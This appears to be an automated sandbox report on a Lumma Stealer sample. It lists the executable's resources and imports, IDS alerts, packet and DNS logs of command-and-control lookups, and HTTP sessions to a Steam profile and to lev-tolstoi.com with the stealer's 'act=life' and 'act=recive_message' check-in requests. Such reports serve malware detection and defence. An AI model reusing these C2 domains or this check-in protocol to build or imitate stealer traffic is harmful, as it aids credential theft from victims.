RT_CURSOR | 0x429e88 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4276315789473684
RT_CURSOR | 0x429fd0 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
RT_CURSOR | 0x42a100 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
RT_ICON | 0x423630 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.552771855010661
RT_ICON | 0x4244d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.6146209386281588
RT_ICON | 0x424d80 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.6474654377880185
RT_ICON | 0x425448 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.6697976878612717
RT_ICON | 0x4259b0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.4378630705394191
RT_ICON | 0x427f58 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.5117260787992496
RT_ICON | 0x429000 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | | | 0.5172131147540984
RT_ICON | 0x429988 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.6108156028368794
RT_STRING | 0x42c888 | 0x454 | data | | | 0.45126353790613716
RT_STRING | 0x42cce0 | 0x126 | data | | | 0.5238095238095238
RT_STRING | 0x42ce08 | 0x656 | data | | | 0.436498150431566
RT_STRING | 0x42d460 | 0x74c | data | | | 0.43147751605995716
RT_STRING | 0x42dbb0 | 0x6a4 | data | | | 0.4376470588235294
RT_STRING | 0x42e258 | 0x74c | data | | | 0.4229122055674518
RT_STRING | 0x42e9a8 | 0x70e | data | | | 0.4330011074197121
RT_STRING | 0x42f0b8 | 0x84e | data | | | 0.4195672624647225
RT_STRING | 0x42f908 | 0x662 | data | | | 0.43512851897184823
RT_STRING | 0x42ff70 | 0x964 | data | | | 0.4068219633943428
RT_STRING | 0x4308d8 | 0x66e | data | | | 0.4356014580801944
RT_STRING | 0x430f48 | 0x60a | data | | | 0.444372574385511
RT_STRING | 0x431558 | 0x22a | data | | | 0.47653429602888087
RT_ACCELERATOR | 0x429e68 | 0x20 | data | | | 1.15625
RT_GROUP_CURSOR | 0x429fb8 | 0x14 | data | | | 1.15
RT_GROUP_CURSOR | 0x42c6a8 | 0x22 | data | | | 1.088235294117647
RT_GROUP_ICON | 0x429df0 | 0x76 | data | | | 0.6610169491525424
RT_VERSION | 0x42c6d0 | 0x1b4 | data | | | 0.573394495412844
DLL | Import
KERNEL32.dll | DeleteVolumeMountPointA, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, GetComputerNameW, GetModuleHandleW, GetDateFormatA, LoadLibraryW, GetConsoleMode, ReadProcessMemory, GetTimeFormatW, GetConsoleAliasW, CreateProcessA, GetAtomNameW, GetStartupInfoW, GetShortPathNameA, SetLastError, GetProcAddress, SearchPathA, PulseEvent, BuildCommDCBW, GetNumaHighestNodeNumber, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, LocalAlloc, AddAtomA, FoldStringW, SetLocaleInfoW, RequestWakeupLatency, WriteConsoleOutputAttribute, FindFirstVolumeA, FindAtomW, UnregisterWaitEx, OpenFileMappingA, CreateFileA, WriteConsoleW, SetFileAttributesA, GetCommandLineW, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, LeaveCriticalSection, EnterCriticalSection, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, HeapSize, ReadFile, GetConsoleCP, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, GetModuleHandleA
USER32.dll | GetClassLongW
GDI32.dll | GetBitmapBits
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-28T10:05:15.286974+0100 | 2058576 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) | 1 | 192.168.2.8 | 63357 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:15.432014+0100 | 2058584 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) | 1 | 192.168.2.8 | 55711 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:15.573887+0100 | 2058586 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) | 1 | 192.168.2.8 | 50775 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:15.715330+0100 | 2058588 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) | 1 | 192.168.2.8 | 58380 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:15.857537+0100 | 2058580 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) | 1 | 192.168.2.8 | 61993 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:16.000648+0100 | 2058590 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) | 1 | 192.168.2.8 | 60487 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:16.144554+0100 | 2058572 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) | 1 | 192.168.2.8 | 50102 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:16.294003+0100 | 2058578 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) | 1 | 192.168.2.8 | 54158 | 1.1.1.1 | 53 | UDP
2024-12-28T10:05:18.031260+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | TCP
2024-12-28T10:05:18.814081+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | TCP
2024-12-28T10:05:20.443634+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:21.198377+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:21.198377+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:22.525521+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:23.309324+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:23.309324+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:25.031841+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:25.937122+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:27.299569+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49710 | 172.67.157.254 | 443 | TCP
2024-12-28T10:05:29.962225+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49711 | 172.67.157.254 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 10:05:16.584153891 CET | 49706 | 443 | 192.168.2.8 | 23.55.153.106
Dec 28, 2024 10:05:16.584209919 CET | 443 | 49706 | 23.55.153.106 | 192.168.2.8
Dec 28, 2024 10:05:16.584302902 CET | 49706 | 443 | 192.168.2.8 | 23.55.153.106
Dec 28, 2024 10:05:16.587308884 CET | 49706 | 443 | 192.168.2.8 | 23.55.153.106
Dec 28, 2024 10:05:16.587326050 CET | 443 | 49706 | 23.55.153.106 | 192.168.2.8
Dec 28, 2024 10:05:18.031179905 CET | 443 | 49706 | 23.55.153.106 | 192.168.2.8
Dec 28, 2024 10:05:18.031260014 CET | 49706 | 443 | 192.168.2.8 | 23.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.033910036 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.033932924 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.034197092 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.077202082 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.089616060 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.135334969 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814119101 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814138889 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814171076 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814182043 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814186096 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814208984 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814222097 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814230919 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814239025 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814263105 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001334906 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001385927 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001446009 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001475096 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001517057 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032476902 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032515049 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032551050 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032553911 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032603025 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.035080910 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.035095930 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.035126925 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.035131931 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181129932 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181169033 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181313038 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181657076 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181664944 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.443536997 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.443634033 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.522727013 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.522747040 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.523045063 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.524142027 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.524168968 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.524205923 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198374987 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198467970 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198509932 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198972940 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198992968 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.199014902 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.199022055 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267256975 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267332077 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267400026 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267944098 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267957926 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.525435925 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.525521040 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.526719093 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.526731014 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.526932955 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.528119087 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.528141022 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.528182983 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309338093 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309402943 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309428930 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309456110 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309457064 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309488058 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309504032 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317800045 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317846060 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317853928 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317874908 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317913055 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.326210022 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.367263079 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.367296934 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.423429012 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.428916931 CET44349708172.67.157.254192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 10:05:15.286973953 CET | 192.168.2.8 | 1.1.1.1 | 0xdd5e | Standard query (0) | cashfuzysao.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:05:15.432013988 CET | 192.168.2.8 | 1.1.1.1 | 0x4305 | Standard query (0) | prisonyfork.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:05:15.573887110 CET | 192.168.2.8 | 1.1.1.1 | 0x6e63 | Standard query (0) | rebuildeso.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:05:15.715329885 CET | 192.168.2.8 | 1.1.1.1 | 0xd655 | Standard query (0) | scentniej.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:05:15.857537031 CET | 192.168.2.8 | 1.1.1.1 | 0x264 | Standard query (0) | inherineau.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:05:16.000648022 CET | 192.168.2.8 | 1.1.1.1 | 0x90c9 | Standard query (0) | screwamusresz.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:05:16.144553900 CET | 192.168.2.8 | 1.1.1.1 | 0x8814 | Standard query (0) | appliacnesot.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:05:16.294003010 CET | 192.168.2.8 | 1.1.1.1 | 0x781f | Standard query (0) | hummskitnj.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:05:16.439160109 CET | 192.168.2.8 | 1.1.1.1 | 0x2df5 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.038608074 CET192.168.2.81.1.1.10x3f02Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.426991940 CET1.1.1.1192.168.2.80xdd5eName error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.572371006 CET1.1.1.1192.168.2.80x4305Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.713772058 CET1.1.1.1192.168.2.80x6e63Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.855832100 CET1.1.1.1192.168.2.80xd655Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.997457981 CET1.1.1.1192.168.2.80x264Name error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.141239882 CET1.1.1.1192.168.2.80x90c9Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.287050962 CET1.1.1.1192.168.2.80x8814Name error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.433768988 CET1.1.1.1192.168.2.80x781fName error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.578535080 CET1.1.1.1192.168.2.80x2df5No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.180243015 CET1.1.1.1192.168.2.80x3f02No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.180243015 CET1.1.1.1192.168.2.80x3f02No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | 7680 | C:\Users\user\Desktop\MPgkx6bQIQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 09:05:18 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-28 09:05:18 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sat, 28 Dec 2024 09:05:18 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=a52a1783951580a407429088; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-28 09:05:18 UTC | 14479 | IN | Data Raw: [hex dump omitted]
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-28 09:05:18 UTC | 10097 | IN | Data Raw: [hex dump omitted]
Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-28 09:05:19 UTC | 10545 | IN | Data Raw: [hex dump omitted]
Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | 7680 | C:\Users\user\Desktop\MPgkx6bQIQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 09:05:20 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-28 09:05:20 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-28 09:05:21 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 09:05:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=fuj5olnlfmgditvpafo7pcvrm9; expires=Wed, 23 Apr 2025 02:51:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yt%2BnlZu01e5ulu6WlNhuTOx7M%2FHy3Yx5QE%2BEU8HUCl94gbyPY9S%2Bt%2FarD6KuTiiDylwd0BoNydi3lSfeHJzioLuRZ0zKIADiRpzMSRo3qoI4e98UFZpnHD4W1H0WVhAZKYA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9063588e5fc439-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1508&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1936339&cwnd=207&unsent_bytes=0&cid=7a799228ededecd0&ts=766&x=0"
2024-12-28 09:05:21 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-28 09:05:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | 7680 | C:\Users\user\Desktop\MPgkx6bQIQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 09:05:22 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 74
Host: lev-tolstoi.com
2024-12-28 09:05:22 UTC | 74 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2024-12-28 09:05:23 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 09:05:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=4nb3cdj9rl4sea1ph5bjq5bakn; expires=Wed, 23 Apr 2025 02:52:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
